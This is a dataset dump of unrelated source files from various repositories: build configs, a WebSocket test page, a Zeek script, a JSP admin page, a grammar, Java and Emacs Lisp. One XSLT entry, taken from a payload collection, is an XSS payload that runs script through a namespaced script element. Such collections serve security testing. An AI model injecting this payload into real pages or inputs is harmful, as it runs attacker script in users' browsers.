content
stringlengths
4
1.04M
lang
stringclasses
358 values
score
int64
0
5
repo_name
stringlengths
5
114
repo_path
stringlengths
4
229
repo_licenses
listlengths
1
8
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>WebSocket Test</title> </head> <body> <h2>WebSocket Test</h2> <div id="output"></div> <script type="text/javascript"> var output = document.getElementById('output'); function println(message) { const p = document.createElement('p'); p.innerHTML = message; output.appendChild(p); } // Websocket echo server, provided from https://www.websocket.org/echo.html var targetUrl = 'wss://echo.websocket.org'; var messageContent = 'Hello friends :^)'; println('<span style="color: blue;">Connecting to:</span> ' + targetUrl); websocket = new WebSocket(targetUrl); websocket.onopen = function() { println('<span style="color: green;">Connected to:</span> ' + targetUrl); println('<span style="color: blue;">Sending Message:</span> ' + messageContent); websocket.send(messageContent); }; websocket.onmessage = function(event) { println('<span style="color: green;">Received Response:</span> ' + event.data); println('<span style="color: blue;">Closing connection...</span> '); websocket.close(); }; websocket.onerror = function(evt) { println('<span style="color: red;">ERROR:</span> ' + evt.data); }; websocket.onclose = function() { println('<span style="color: green;">Connection closed!</span>'); }; </script> </body> </html>
HTML
4
r00ster91/serenity
Base/res/html/misc/websocket.html
[ "BSD-2-Clause" ]
freebsd { INCLUDEPATH += /usr/local/include/qt5keychain LIBS += -lqt5keychain } else { unix:!android:!macx:!ios { DEFINES += KEYCHAIN_DBUS } include(qtkeychain/qt5keychain.pri) }
QMake
3
boralv/chatterino2
lib/qtkeychain.pri
[ "MIT" ]
{ metadata: { namespace: "securitypolicyviolation_disposition_names", export: "CORE_EXPORT", }, data: [ "enforce", "report", ], }
JSON5
2
zealoussnow/chromium
third_party/blink/renderer/core/events/securitypolicyviolation_disposition_names.json5
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
<?xml version="1.0" encoding="utf-8"?> <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> <PropertyGroup> <ProductVersion>3.5</ProductVersion> <RootNamespace>Sugar.Test</RootNamespace> <ProjectGuid>{9f930a22-be43-4d5a-83f6-4afc91282e23}</ProjectGuid> <OutputType>Exe</OutputType> <AssemblyName>Sugar.Test</AssemblyName> <AllowGlobals>False</AllowGlobals> <AllowLegacyWith>False</AllowLegacyWith> <AllowLegacyOutParams>False</AllowLegacyOutParams> <AllowLegacyCreate>False</AllowLegacyCreate> <AllowUnsafeCode>False</AllowUnsafeCode> <Configuration Condition="'$(Configuration)' == ''">Release</Configuration> <TargetFrameworkVersion>v4.0</TargetFrameworkVersion> <Name>Sugar.Echoes.Test</Name> <DefaultUses /> <StartupClass /> <InternalAssemblyName /> <ApplicationIcon /> <TargetFrameworkProfile /> </PropertyGroup> <PropertyGroup Condition=" '$(Configuration)' == 'Debug' "> <Optimize>False</Optimize> <OutputPath>bin\Debug\.NET\</OutputPath> <DefineConstants>DEBUG;TRACE;</DefineConstants> <GeneratePDB>True</GeneratePDB> <GenerateMDB>True</GenerateMDB> <CaptureConsoleOutput>False</CaptureConsoleOutput> <StartMode>Project</StartMode> <CpuType>anycpu</CpuType> <RuntimeVersion>v25</RuntimeVersion> <XmlDoc>False</XmlDoc> <XmlDocWarningLevel>WarningOnPublicMembers</XmlDocWarningLevel> <EnableUnmanagedDebugging>False</EnableUnmanagedDebugging> </PropertyGroup> <PropertyGroup Condition=" '$(Configuration)' == 'Release' "> <Optimize>true</Optimize> <OutputPath>.\bin\Release\.NET</OutputPath> <GeneratePDB>False</GeneratePDB> <GenerateMDB>False</GenerateMDB> <EnableAsserts>False</EnableAsserts> <TreatWarningsAsErrors>False</TreatWarningsAsErrors> <CaptureConsoleOutput>False</CaptureConsoleOutput> <StartMode>Project</StartMode> <RegisterForComInterop>False</RegisterForComInterop> <CpuType>anycpu</CpuType> <RuntimeVersion>v25</RuntimeVersion> <XmlDoc>False</XmlDoc> <XmlDocWarningLevel>WarningOnPublicMembers</XmlDocWarningLevel> <EnableUnmanagedDebugging>False</EnableUnmanagedDebugging> </PropertyGroup> <ItemGroup> <Reference Include="mscorlib" /> <Reference Include="RemObjects.Elements.EUnit" /> <Reference Include="System" /> <Reference Include="System.Configuration" /> <Reference Include="System.Data" /> </ItemGroup> <ItemGroup> <Compile Include="Main\Echoes\Program.pas" /> <Compile Include="Properties\AssemblyInfo.pas" /> <Compile Include="Tests\AutoreleasePool.pas" /> <Compile Include="Tests\Binary.pas" /> <Compile Include="Tests\Convert.pas" /> <Compile Include="Tests\Cryptography\Utils.pas" /> <Compile Include="Tests\Data\Json\JsonArray.pas" /> <Compile Include="Tests\Data\Json\JsonObject.pas" /> <Compile Include="Tests\Data\Json\JsonObjectParser.pas" /> <Compile Include="Tests\Data\Json\JsonTokenizer.pas" /> <Compile Include="Tests\Data\Json\JsonValueTest.pas" /> <Compile Include="Tests\DateTime.pas" /> <Compile Include="Tests\Dictionary.pas" /> <Compile Include="Tests\Encoding.pas" /> <Compile Include="Tests\Extensions.pas" /> <Compile Include="Tests\Guid.pas" /> <Compile Include="Tests\HashSet.pas" /> <Compile Include="Tests\HTTP.pas" /> <Compile Include="Tests\IO\File.pas" /> <Compile Include="Tests\IO\FileHandle.pas" /> <Compile Include="Tests\IO\FileUtils.pas" /> <Compile Include="Tests\IO\Folder.pas" /> <Compile Include="Tests\IO\FolderUtils.pas" /> <Compile Include="Tests\IO\Path.pas" /> <Compile Include="Tests\List.pas" /> <Compile Include="Tests\Math.pas" /> <Compile Include="Tests\MessageDigest.pas" /> <Compile Include="Tests\Queue.pas" /> <Compile Include="Tests\Random.pas" /> <Compile Include="Tests\RegularExpressions.pas" /> <Compile Include="Tests\Stack.pas" /> <Compile Include="Tests\String.pas" /> <Compile Include="Tests\StringBuilder.pas" /> <Compile Include="Tests\Url.pas" /> <Compile Include="Tests\UserSettings.pas" /> <Compile Include="Tests\Xml\CharacterData.pas" /> <Compile Include="Tests\Xml\Document.pas" /> <Compile Include="Tests\Xml\DocumentType.pas" /> <Compile Include="Tests\Xml\Element.pas" /> <Compile Include="Tests\Xml\Node.pas" /> <Compile Include="Tests\Xml\ProcessingInstruction.pas" /> <Compile Include="Tests\Xml\TestData.pas" /> </ItemGroup> <ItemGroup> <Folder Include="Main\" /> <Folder Include="Main\Echoes\" /> <Folder Include="Tests" /> <Folder Include="Properties\" /> <Folder Include="Tests\Data\Json" /> <Folder Include="Tests\IO" /> <Folder Include="Tests\Cryptography" /> <Folder Include="Tests\Data" /> <Folder Include="Tests\Xml" /> </ItemGroup> <ItemGroup> <ProjectReference Include="..\Sugar.Data\Sugar.Data.Echoes.oxygene"> <Name>Sugar.Data.Echoes</Name> <Project>{77ba48da-3022-4e3c-ab2e-885ff84b5efe}</Project> <Private>True</Private> <HintPath>..\Sugar.Data\bin\.NET\Sugar.Data.dll</HintPath> </ProjectReference> <ProjectReference Include="..\Sugar\Sugar.Echoes.oxygene"> <Name>Sugar.Echoes</Name> <Project>{79301a0c-1f95-4fb0-9605-207e288c6171}</Project> <Private>True</Private> <HintPath>..\Sugar\bin\.NET\Sugar.dll</HintPath> </ProjectReference> </ItemGroup> <Import Project="$(MSBuildExtensionsPath)\RemObjects Software\Oxygene\RemObjects.Oxygene.Echoes.targets" /> <PropertyGroup> <PreBuildEvent /> </PropertyGroup> </Project>
Oxygene
2
nchevsky/remobjects-sugar
Sugar.Tests/Sugar.Echoes.Test.oxygene
[ "BSD-3-Clause" ]
var first = 1 var second = 1 var index = 2 while index < 50 { var new = first + second first = second second = new index = index + 1 } println(second)
Harbour
3
dirk/hummingbird
examples/fibonacci.hb
[ "BSD-3-Clause" ]
/* * Copyright (c) 2020, Oracle and/or its affiliates. All rights reserved. * Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl. */ function invoke(f) { f("hello"); } function f1() { println("f1"); } function main() { invoke(f1); invoke(foo); }
Slash
3
guillermomolina/simplelanguage
language/tests/error/UndefinedFunction02.sl
[ "UPL-1.0" ]
--- hello: world a: - 123 - 666 --- .class { }
CSS
0
fuelingtheweb/prettier
tests/css_yaml/dirty.css
[ "MIT" ]
##! Add SNI info to the SSL record export { # Adding a vector of SNI names to the standard SSL log redef record SSL::Info += { SNI: string_vec &optional &log; }; } # Hook the ssl_extension_server_name event to receive data any time the Server Name # extension is available. Add the name to the standard SSL log. event ssl_extension_server_name(c: connection, is_orig: bool, names: string_vec) { c$ssl$SNI = names; }
Bro
4
reservoirlabs/bro-scripts
sni_hook.bro
[ "Apache-2.0" ]
<%@ page contentType="text/html; charset=utf-8" %> <%@ taglib prefix="a" uri="/WEB-INF/app.tld"%> <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%> <%@ taglib prefix="res" uri="http://www.unidal.org/webres"%> <%@ taglib prefix="w" uri="http://www.unidal.org/web/core"%> <%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn" %> <jsp:useBean id="ctx" type="com.dianping.cat.report.page.server.Context" scope="request" /> <jsp:useBean id="payload" type="com.dianping.cat.report.page.server.Payload" scope="request" /> <jsp:useBean id="model" type="com.dianping.cat.report.page.server.Model" scope="request" /> <a:serverBody> <script src="${model.webapp}/assets/js/bootstrap-tag.min.js"></script> <h3 class="text-center text-success"> <c:choose> <c:when test="${not empty payload.screen}"> 编辑Screen[${payload.screen}]配置 </c:when> <c:otherwise> 添加Screen </c:otherwise> </c:choose> </h3> <table class="table table-striped table-condensed " id="content"> <input type="hidden" name="op" value="screenSubmit" /> <tr> <th width="10%">名字</th> <c:choose> <c:when test="${not empty payload.screen}"> <th><input type="text" id="screenName" value="${payload.screen}" size="50" readonly/></th> </c:when> <c:otherwise> <th><input type="text" id="screenName" value="" size="50"/></th> </c:otherwise> </c:choose> </tr> <tr> <td width="10%">graphs</td> <td> <input type="text" name="graphs" class="tag" id="tag_graphs" placeholder="Enter endPoints ..." /> </td> </tr> </table> <input class='btn btn-primary btn-sm' style="MARGIN-LEFT:45%" type="button" value="提交" onclick="submit();"/> </a:serverBody> <script type="text/javascript"> function submit(){ var screen = $('#screenName').val(); console.log(screen) var graphs = $('#tag_graphs').val(); window.location.href = "?op=screenSubmit&screen="+screen+"&graph="+graphs; } $(document).ready(function() { $('#serverConfig').addClass('active open'); $('#serverScreens').addClass('active'); var tag_input = $('#tag_graphs'); try{ tag_input.tag( { placeholder:tag_input.attr('placeholder'), } ) //programmatically add a new var $tag_obj = tag_input.data('tag'); <c:forEach var="item" items="${model.graphs}" varStatus="status"> $tag_obj.add("${item}"); </c:forEach> } catch(e) { //display a textarea for old IE, because it doesn't support this plugin or another one I tried! tag_input.after('<textarea id="'+tag_input.attr('id')+'" name="'+tag_input.attr('name')+'" rows="3">'+tag_input.val()+'</textarea>').remove(); //$('#form-field-tags').autosize({append: "\n"}); } }); </script> <style> .tags { width:95%; } .tags </style>
Java Server Pages
4
woozhijun/cat
cat-home/src/main/webapp/jsp/report/server/screenUpdate.jsp
[ "Apache-2.0" ]
.lib "unit_test.dll" Context( mesg$ ):"_bbContext@4" Expect( condition%,mesg$ ):"_bbExpect@8" ExpectIntEq( a%,b%,mesg$ ):"_bbExpectIntEq@12" ExpectFloatEq( a#,b#,mesg$ ):"_bbExpectFloatEq@12"
BlitzBasic
2
blitz3d-ng/blitz3d-ng
src/modules/bb/unit-test/unit_test.decls
[ "Zlib" ]
implementation-class=org.jetbrains.kotlin.noarg.gradle.KotlinJpaSubplugin
INI
0
qussarah/declare
libraries/tools/kotlin-noarg/src/main/resources/META-INF/gradle-plugins/org.jetbrains.kotlin.plugin.jpa.properties
[ "Apache-2.0" ]
# waitterm # wait TERM/INT signal. # see: http://veithen.github.io/2014/11/16/sigterm-propagation.html waitterm() { local PID # any process to block tail -f /dev/null & PID="$!" # setup trap, could do nothing, or just kill the blocker trap "kill -TERM ${PID}" TERM INT # wait for signal, ignore wait exit code wait "${PID}" || true # clear trap trap - TERM INT # wait blocker, ignore blocker exit code wait "${PID}" 2>/dev/null || true } # waittermpid "${PIDFILE}". # monitor process by pidfile && wait TERM/INT signal. # if the process disappeared, return 1, means exit with ERROR. # if TERM or INT signal received, return 0, means OK to exit. waittermpid() { local PIDFILE PID do_run error PIDFILE="${1?}" do_run=true error=0 trap "do_run=false" TERM INT while "${do_run}" ; do PID="$(cat "${PIDFILE}")" if ! ps -p "${PID}" >/dev/null 2>&1 ; then do_run=false error=1 else sleep 1 fi done trap - TERM INT return "${error}" }
Shell
5
yuanweikang2020/canal
docker/image/alidata/lib/proc.sh
[ "Apache-2.0" ]
/* Test! */ component { public void function function1() { someVar = ''; } }
ColdFusion CFC
0
tonym128/CFLint
src/test/resources/com/cflint/tests/Ignores/ignoreMultiLineComponent.cfc
[ "BSD-3-Clause" ]
grammar ResourceMethodKey; @header { package com.linkedin.restli.server.config; } key : ( restResource | '*' ) '.' ( operation | '*' ); restResource : Name ( '-' Name )* ( ':' Name )*; operation : simpleOp | complex; simpleOp : 'GET' | 'BATCH_GET' | 'CREATE' | 'BATCH_CREATE' | 'PARTIAL_UPDATE' | 'UPDATE' | 'BATCH_UPDATE' | 'DELETE' | 'BATCH_PARTIAL_UPDATE' | 'BATCH_DELETE' | 'GET_ALL' | 'OPTIONS'; complex : complexOp '-' ( Name | '*' ); complexOp : 'FINDER' | 'ACTION' | 'BATCH_FINDER'; Name : [a-zA-Z_0-9]+;
ANTLR
3
haroldl/rest.li
restli-server/src/main/antlr/com/linkedin/restli/server/config/ResourceMethodKey.g4
[ "Apache-2.0" ]
.parentContainer .header { font-size: 40px; } .parentContainer input { padding: 10px; font-size: 16px; width: 90%; border: 2px solid #003399; } .parentContainer .todoList { list-style: none; padding-left: 0; margin-top: 50px; width: 93%; } .parentContainer .todoList li { color: #333; background-color: #dedede; padding: 15px; margin-bottom: 15px; border-radius: 5px; cursor: pointer; } .parentContainer .todoLabel { width: 80%; } .parentContainer .deleteLabel { color: #ff0000; position: absolute; cursor: pointer; right: 0px; width: 150px; }
CSS
3
gh-oss-contributor/graphql-engine-1
community/sample-apps/todo-auth0-jwt/todo-app/src/Todo/Todo.css
[ "Apache-2.0", "MIT" ]
@0xf9468fe902e7fa8e; # unique file ID, generated by `capnp id` using D= import "data.capnp"; struct PackFileEntry { artifact @0 :D.Artifact; assetMetadata @1 :D.AssetMetadata; path @2 :Data; } struct PackFile { entries @0 :List(PackFileEntry); }
Cap'n Proto
3
jlowry/atelier-assets
schema/schemas/pack.capnp
[ "Apache-2.0", "MIT" ]
// Copyright 2016 the V8 project authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "test/cctest/interpreter/bytecode-expectations-printer.h" #include <iomanip> #include <iostream> #include <vector> #include "include/libplatform/libplatform.h" #include "include/v8-function.h" #include "src/api/api-inl.h" #include "src/base/logging.h" #include "src/codegen/source-position-table.h" #include "src/interpreter/bytecode-array-iterator.h" #include "src/interpreter/bytecode-generator.h" #include "src/interpreter/bytecodes.h" #include "src/interpreter/interpreter-intrinsics.h" #include "src/interpreter/interpreter.h" #include "src/objects/heap-number-inl.h" #include "src/objects/module-inl.h" #include "src/objects/objects-inl.h" #include "src/runtime/runtime.h" #include "src/utils/ostreams.h" #include "test/cctest/cctest.h" namespace v8 { namespace internal { namespace interpreter { static const char* NameForNativeContextIntrinsicIndex(uint32_t idx) { switch (idx) { #define COMPARE_NATIVE_CONTEXT_INTRINSIC_IDX(NAME, Type, name) \ case Context::NAME: \ return #name; NATIVE_CONTEXT_INTRINSIC_FUNCTIONS(COMPARE_NATIVE_CONTEXT_INTRINSIC_IDX) default: break; } return "UnknownIntrinsicIndex"; } // static const char* const BytecodeExpectationsPrinter::kDefaultTopFunctionName = "__genbckexp_wrapper__"; const char* const BytecodeExpectationsPrinter::kIndent = " "; v8::Local<v8::String> BytecodeExpectationsPrinter::V8StringFromUTF8( const char* data) const { return v8::String::NewFromUtf8(isolate_, data).ToLocalChecked(); } std::string BytecodeExpectationsPrinter::WrapCodeInFunction( const char* function_name, const std::string& function_body) const { std::ostringstream program_stream; program_stream << "function " << function_name << "() {" << function_body << "}\n" << function_name << "();"; return program_stream.str(); } v8::Local<v8::Script> BytecodeExpectationsPrinter::CompileScript( const char* program) const { v8::Local<v8::String> source = V8StringFromUTF8(program); return v8::Script::Compile(isolate_->GetCurrentContext(), source) .ToLocalChecked(); } v8::Local<v8::Module> BytecodeExpectationsPrinter::CompileModule( const char* program) const { ScriptOrigin origin(isolate_, Local<v8::Value>(), 0, 0, false, -1, Local<v8::Value>(), false, false, true); v8::ScriptCompiler::Source source(V8StringFromUTF8(program), origin); return v8::ScriptCompiler::CompileModule(isolate_, &source).ToLocalChecked(); } void BytecodeExpectationsPrinter::Run(v8::Local<v8::Script> script) const { MaybeLocal<Value> result = script->Run(isolate_->GetCurrentContext()); USE(result); } i::Handle<v8::internal::BytecodeArray> BytecodeExpectationsPrinter::GetBytecodeArrayForGlobal( const char* global_name) const { const v8::Local<v8::Context>& context = isolate_->GetCurrentContext(); v8::Local<v8::String> v8_global_name = V8StringFromUTF8(global_name); v8::Local<v8::Function> function = v8::Local<v8::Function>::Cast( context->Global()->Get(context, v8_global_name).ToLocalChecked()); i::Handle<i::JSFunction> js_function = i::Handle<i::JSFunction>::cast(v8::Utils::OpenHandle(*function)); i::Handle<i::BytecodeArray> bytecodes = i::handle( js_function->shared().GetBytecodeArray(i_isolate()), i_isolate()); return bytecodes; } i::Handle<i::BytecodeArray> BytecodeExpectationsPrinter::GetBytecodeArrayForModule( v8::Local<v8::Module> module) const { i::Handle<i::Module> i_module = v8::Utils::OpenHandle(*module); return i::handle(SharedFunctionInfo::cast( Handle<i::SourceTextModule>::cast(i_module)->code()) .GetBytecodeArray(i_isolate()), i_isolate()); } i::Handle<i::BytecodeArray> BytecodeExpectationsPrinter::GetBytecodeArrayForScript( v8::Local<v8::Script> script) const { i::Handle<i::JSFunction> js_function = v8::Utils::OpenHandle(*script); return i::handle(js_function->shared().GetBytecodeArray(i_isolate()), i_isolate()); } i::Handle<i::BytecodeArray> BytecodeExpectationsPrinter::GetBytecodeArrayOfCallee( const char* source_code) const { i::Handle<i::Object> i_object = v8::Utils::OpenHandle(*CompileRun(source_code)); i::Handle<i::JSFunction> js_function = i::Handle<i::JSFunction>::cast(i_object); CHECK(js_function->shared().HasBytecodeArray()); return i::handle(js_function->shared().GetBytecodeArray(i_isolate()), i_isolate()); } void BytecodeExpectationsPrinter::PrintEscapedString( std::ostream* stream, const std::string& string) const { for (char c : string) { switch (c) { case '"': *stream << "\\\""; break; case '\\': *stream << "\\\\"; break; default: *stream << c; break; } } } void BytecodeExpectationsPrinter::PrintBytecodeOperand( std::ostream* stream, const BytecodeArrayIterator& bytecode_iterator, const Bytecode& bytecode, int op_index, int parameter_count) const { OperandType op_type = Bytecodes::GetOperandType(bytecode, op_index); OperandSize op_size = Bytecodes::GetOperandSize( bytecode, op_index, bytecode_iterator.current_operand_scale()); const char* size_tag; switch (op_size) { case OperandSize::kByte: size_tag = "8"; break; case OperandSize::kShort: size_tag = "16"; break; case OperandSize::kQuad: size_tag = "32"; break; default: UNREACHABLE(); } if (Bytecodes::IsRegisterOperandType(op_type)) { Register register_value = bytecode_iterator.GetRegisterOperand(op_index); *stream << 'R'; if (op_size != OperandSize::kByte) *stream << size_tag; if (register_value.is_current_context()) { *stream << "(context)"; } else if (register_value.is_function_closure()) { *stream << "(closure)"; } else if (register_value.is_parameter()) { int parameter_index = register_value.ToParameterIndex(parameter_count); if (parameter_index == 0) { *stream << "(this)"; } else { *stream << "(arg" << (parameter_index - 1) << ')'; } } else { *stream << '(' << register_value.index() << ')'; } } else { switch (op_type) { case OperandType::kFlag8: *stream << 'U' << size_tag << '('; *stream << bytecode_iterator.GetFlagOperand(op_index); break; case OperandType::kIdx: { *stream << 'U' << size_tag << '('; *stream << bytecode_iterator.GetIndexOperand(op_index); break; } case OperandType::kUImm: *stream << 'U' << size_tag << '('; *stream << bytecode_iterator.GetUnsignedImmediateOperand(op_index); break; case OperandType::kImm: *stream << 'I' << size_tag << '('; *stream << bytecode_iterator.GetImmediateOperand(op_index); break; case OperandType::kRegCount: *stream << 'U' << size_tag << '('; *stream << bytecode_iterator.GetRegisterCountOperand(op_index); break; case OperandType::kRuntimeId: { *stream << 'U' << size_tag << '('; Runtime::FunctionId id = bytecode_iterator.GetRuntimeIdOperand(op_index); *stream << "Runtime::k" << i::Runtime::FunctionForId(id)->name; break; } case OperandType::kIntrinsicId: { *stream << 'U' << size_tag << '('; Runtime::FunctionId id = bytecode_iterator.GetIntrinsicIdOperand(op_index); *stream << "Runtime::k" << i::Runtime::FunctionForId(id)->name; break; } case OperandType::kNativeContextIndex: { *stream << 'U' << size_tag << '('; uint32_t idx = bytecode_iterator.GetNativeContextIndexOperand(op_index); *stream << "%" << NameForNativeContextIntrinsicIndex(idx); break; } default: UNREACHABLE(); } *stream << ')'; } } void BytecodeExpectationsPrinter::PrintBytecode( std::ostream* stream, const BytecodeArrayIterator& bytecode_iterator, int parameter_count) const { Bytecode bytecode = bytecode_iterator.current_bytecode(); OperandScale operand_scale = bytecode_iterator.current_operand_scale(); if (Bytecodes::OperandScaleRequiresPrefixBytecode(operand_scale)) { Bytecode prefix = Bytecodes::OperandScaleToPrefixBytecode(operand_scale); *stream << "B(" << Bytecodes::ToString(prefix) << "), "; } *stream << "B(" << Bytecodes::ToString(bytecode) << ')'; int operands_count = Bytecodes::NumberOfOperands(bytecode); for (int op_index = 0; op_index < operands_count; ++op_index) { *stream << ", "; PrintBytecodeOperand(stream, bytecode_iterator, bytecode, op_index, parameter_count); } } void BytecodeExpectationsPrinter::PrintSourcePosition( std::ostream* stream, SourcePositionTableIterator* source_iterator, int bytecode_offset) const { static const size_t kPositionWidth = 4; if (!source_iterator->done() && source_iterator->code_offset() == bytecode_offset) { *stream << "/* " << std::setw(kPositionWidth) << source_iterator->source_position().ScriptOffset(); if (source_iterator->is_statement()) { *stream << " S> */ "; } else { *stream << " E> */ "; } source_iterator->Advance(); } else { *stream << " " << std::setw(kPositionWidth) << ' ' << " "; } } void BytecodeExpectationsPrinter::PrintV8String(std::ostream* stream, i::String string) const { *stream << '"'; for (int i = 0, length = string.length(); i < length; ++i) { *stream << i::AsEscapedUC16ForJSON(string.Get(i)); } *stream << '"'; } void BytecodeExpectationsPrinter::PrintConstant( std::ostream* stream, i::Handle<i::Object> constant) const { if (constant->IsSmi()) { *stream << "Smi ["; i::Smi::cast(*constant).SmiPrint(*stream); *stream << "]"; } else { *stream << i::HeapObject::cast(*constant).map().instance_type(); if (constant->IsHeapNumber()) { *stream << " ["; i::HeapNumber::cast(*constant).HeapNumberShortPrint(*stream); *stream << "]"; } else if (constant->IsString()) { *stream << " ["; PrintV8String(stream, i::String::cast(*constant)); *stream << "]"; } } } void BytecodeExpectationsPrinter::PrintFrameSize( std::ostream* stream, i::Handle<i::BytecodeArray> bytecode_array) const { int32_t frame_size = bytecode_array->frame_size(); DCHECK(IsAligned(frame_size, kSystemPointerSize)); *stream << "frame size: " << frame_size / kSystemPointerSize << "\nparameter count: " << bytecode_array->parameter_count() << '\n'; } void BytecodeExpectationsPrinter::PrintBytecodeSequence( std::ostream* stream, i::Handle<i::BytecodeArray> bytecode_array) const { *stream << "bytecode array length: " << bytecode_array->length() << "\nbytecodes: [\n"; SourcePositionTableIterator source_iterator( bytecode_array->SourcePositionTable()); BytecodeArrayIterator bytecode_iterator(bytecode_array); for (; !bytecode_iterator.done(); bytecode_iterator.Advance()) { *stream << kIndent; PrintSourcePosition(stream, &source_iterator, bytecode_iterator.current_offset()); PrintBytecode(stream, bytecode_iterator, bytecode_array->parameter_count()); *stream << ",\n"; } *stream << "]\n"; } void BytecodeExpectationsPrinter::PrintConstantPool( std::ostream* stream, i::FixedArray constant_pool) const { *stream << "constant pool: [\n"; int num_constants = constant_pool.length(); if (num_constants > 0) { for (int i = 0; i < num_constants; ++i) { *stream << kIndent; PrintConstant(stream, i::FixedArray::get(constant_pool, i, i_isolate())); *stream << ",\n"; } } *stream << "]\n"; } void BytecodeExpectationsPrinter::PrintCodeSnippet( std::ostream* stream, const std::string& body) const { *stream << "snippet: \"\n"; std::stringstream body_stream(body); std::string body_line; while (std::getline(body_stream, body_line)) { *stream << kIndent; PrintEscapedString(stream, body_line); *stream << '\n'; } *stream << "\"\n"; } void BytecodeExpectationsPrinter::PrintHandlers( std::ostream* stream, i::Handle<i::BytecodeArray> bytecode_array) const { *stream << "handlers: [\n"; HandlerTable table(*bytecode_array); for (int i = 0, num_entries = table.NumberOfRangeEntries(); i < num_entries; ++i) { *stream << " [" << table.GetRangeStart(i) << ", " << table.GetRangeEnd(i) << ", " << table.GetRangeHandler(i) << "],\n"; } *stream << "]\n"; } void BytecodeExpectationsPrinter::PrintBytecodeArray( std::ostream* stream, i::Handle<i::BytecodeArray> bytecode_array) const { PrintFrameSize(stream, bytecode_array); PrintBytecodeSequence(stream, bytecode_array); PrintConstantPool(stream, bytecode_array->constant_pool()); PrintHandlers(stream, bytecode_array); } void BytecodeExpectationsPrinter::PrintExpectation( std::ostream* stream, const std::string& snippet) const { std::string source_code = wrap_ ? WrapCodeInFunction(test_function_name_.c_str(), snippet) : snippet; i::FLAG_compilation_cache = false; i::Handle<i::BytecodeArray> bytecode_array; if (module_) { CHECK(top_level_ && !wrap_); v8::Local<v8::Module> module = CompileModule(source_code.c_str()); bytecode_array = GetBytecodeArrayForModule(module); } else if (print_callee_) { bytecode_array = GetBytecodeArrayOfCallee(source_code.c_str()); } else { v8::Local<v8::Script> script = CompileScript(source_code.c_str()); if (top_level_) { bytecode_array = GetBytecodeArrayForScript(script); } else { Run(script); bytecode_array = GetBytecodeArrayForGlobal(test_function_name_.c_str()); } } *stream << "---\n"; PrintCodeSnippet(stream, snippet); PrintBytecodeArray(stream, bytecode_array); *stream << '\n'; } } // namespace interpreter } // namespace internal } // namespace v8
C++
5
EXHades/v8
test/cctest/interpreter/bytecode-expectations-printer.cc
[ "BSD-3-Clause" ]
# if(ANDROID AND ANDROID_NATIVE_API_LEVEL GREATER_EQUAL 24) <-- would be nicer but requires CMake 3.7 or later if(ANDROID AND ANDROID_NATIVE_API_LEVEL GREATER 23) set(HAVE_ANDROID_NATIVE_CAMERA TRUE) set(libs "-landroid -llog -lcamera2ndk") ocv_add_external_target(android_native_camera "" "${libs}" "HAVE_ANDROID_NATIVE_CAMERA") endif()
CMake
3
xipingyan/opencv
modules/videoio/cmake/detect_android_camera.cmake
[ "Apache-2.0" ]
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
XSLT
0
Linuxinet/PayloadsAllTheThings
XSS Injection/Files/xss.xslt
[ "MIT" ]
' createlabel.bmx Import MaxGui.Drivers Strict Local window:TGadget window=CreateWindow("My Window",30,20,320,480) CreateLabel("A plain label",10,10,280,52,window) CreateLabel("A label with LABEL_FRAME",10,80,280,60,window,LABEL_FRAME) CreateLabel("A label with LABEL_SUNKENFRAME",10,150,280,60,window,LABEL_SUNKENFRAME) CreateLabel("not applicable",10,220,280,54,window,LABEL_SEPARATOR) While WaitEvent()<>EVENT_WINDOWCLOSE Wend
BlitzMax
3
jabdoa2/blitzmax
mod/maxgui.mod/maxgui.mod/doc/createlabel.bmx
[ "Zlib" ]
;;; ui/tabs/config.el -*- lexical-binding: t; -*- (use-package! centaur-tabs :hook (doom-first-file . centaur-tabs-mode) :init (setq centaur-tabs-set-icons t centaur-tabs-gray-out-icons 'buffer centaur-tabs-set-bar 'left centaur-tabs-set-modified-marker t centaur-tabs-close-button "✕" centaur-tabs-modified-marker "•" ;; Scrolling (with the mouse wheel) past the end of the tab list ;; replaces the tab list with that of another Doom workspace. This ;; prevents that. centaur-tabs-cycle-scope 'tabs) :config (add-hook! '(+doom-dashboard-mode-hook +popup-buffer-mode-hook) (defun +tabs-disable-centaur-tabs-mode-maybe-h () "Disable `centaur-tabs-mode' in current buffer." (when (centaur-tabs-mode-on-p) (centaur-tabs-local-mode))))) ;; TODO tab-bar-mode (emacs 27) ;; TODO tab-line-mode (emacs 27)
Emacs Lisp
4
leezu/doom-emacs
modules/ui/tabs/config.el
[ "MIT" ]
### Asset Object (object) + id: `08279320-dfc9-11e5-a450-0002a5d5c51b`(string) - The asset ID + mime: `image/jpeg` (string) - The asset mime type + type: `image` (string) - The asset type + path: `12342bh3y3bn3i4i5ii5b43o3n.jpg` (string) - The asset path in the storage + links + full: `https://laravelapi.test/api/assets/0c244c51-0a3b-4b86-829a-ee161c2f966f/render` (string) - The asset link for render full size + thumb: `https://laravelapi.test/api/assets/0c244c51-0a3b-4b86-829a-ee161c2f966f/render?width=200&height=200` (string) - The asset link for render thumb size + created_at : `1997-07-16T19:20:30+01:00` (string) - Date in format iso 8601
API Blueprint
2
vikasDevloper/apiPincode
docs/api/blueprint/dataStructures/assets.apib
[ "MIT" ]
package com.baeldung.externalizable; import java.io.Externalizable; import java.io.IOException; import java.io.ObjectInput; import java.io.ObjectOutput; public class Country implements Externalizable { private static final long serialVersionUID = 1L; private String name; private String capital; private int code; public String getName() { return name; } public void setName(String name) { this.name = name; } public String getCapital() { return capital; } public void setCapital(String capital) { this.capital = capital; } public int getCode() { return code; } public void setCode(int code) { this.code = code; } @Override public void writeExternal(ObjectOutput out) throws IOException { out.writeUTF(name); out.writeUTF(capital); out.writeInt(code); } @Override public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException { this.name = in.readUTF(); this.capital = in.readUTF(); this.code = in.readInt(); } @Override public String toString() { return "Country{" + "name='" + name + '\'' + ", capital='" + capital + '\'' + ", code=" + code + '}'; } }
Java
4
zeesh49/tutorials
core-java/src/main/java/com/baeldung/externalizable/Country.java
[ "MIT" ]
